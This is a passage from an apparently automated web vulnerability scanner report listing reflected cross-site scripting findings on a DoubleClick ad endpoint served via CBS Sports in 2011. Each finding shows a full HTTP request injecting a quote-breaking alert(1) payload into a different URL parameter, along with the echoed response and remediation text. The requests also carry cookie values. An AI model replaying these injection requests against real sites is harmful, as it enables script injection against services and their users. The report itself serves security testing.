307-300/250%3B41864997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=2240884197"-alert(1)-"7be177ce9c5&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.
...[SNIP]...

3.63. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [o parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8102d"-alert(1)-"fa280264549 was submitted in the o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a8102d"-alert(1)-"fa280264549&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:00:31 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
7/169/%2a/i%3B240391556%3B0-0%3B0%3B63194441%3B4307-300/250%3B41864997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a8102d"-alert(1)-"fa280264549&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193
...[SNIP]...

3.64. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [oepartner parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9bd0"-alert(1)-"79bd7310a71 was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=b9bd0"-alert(1)-"79bd7310a71&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:07:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=b9bd0"-alert(1)-"79bd7310a71&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl
...[SNIP]...

3.65. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [orh parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce45e"-alert(1)-"e197175aae8 was submitted in the orh parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.comce45e"-alert(1)-"e197175aae8&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:07:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.comce45e"-alert(1)-"e197175aae8&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");

...[SNIP]...

3.66. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [p parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 201c0"-alert(1)-"1c5f71daa33 was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2201c0"-alert(1)-"1c5f71daa33&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:01:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
/i%3B240391556%3B0-0%3B0%3B63194441%3B4307-300/250%3B41864997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2201c0"-alert(1)-"1c5f71daa33&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&
...[SNIP]...

3.67. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [pdom parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ebfa2"-alert(1)-"617b1722fc6 was submitted in the pdom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.comebfa2"-alert(1)-"617b1722fc6&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:09:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.comebfa2"-alert(1)-"617b1722fc6&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
var fscUrlClickTagFound = false;
v
...[SNIP]...

3.68. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [pg parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd5ca"-alert(1)-"c31bbc784d7 was submitted in the pg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuAcd5ca"-alert(1)-"c31bbc784d7&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:10:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuAcd5ca"-alert(1)-"c31bbc784d7&t=2011.04.27.21.55.50&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess
...[SNIP]...

3.69. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 365f4"-alert(1)-"953eb1f2ac7 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=365f4"-alert(1)-"953eb1f2ac7&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:05:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
00/250%3B41864997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=365f4"-alert(1)-"953eb1f2ac7&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50
...[SNIP]...

3.70. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [pp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb3bf"-alert(1)-"51781714db8 was submitted in the pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100bb3bf"-alert(1)-"51781714db8&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:06:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
64997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100bb3bf"-alert(1)-"51781714db8&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/ht
...[SNIP]...

3.71. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [ppartner parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 257ed"-alert(1)-"07d6b0a1c33 was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=257ed"-alert(1)-"07d6b0a1c33&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:08:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=257ed"-alert(1)-"07d6b0a1c33&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
var fscUrlCl
...[SNIP]...

3.72. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [pt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1502"-alert(1)-"5e7d2cb2fac was submitted in the pt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001e1502"-alert(1)-"5e7d2cb2fac&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
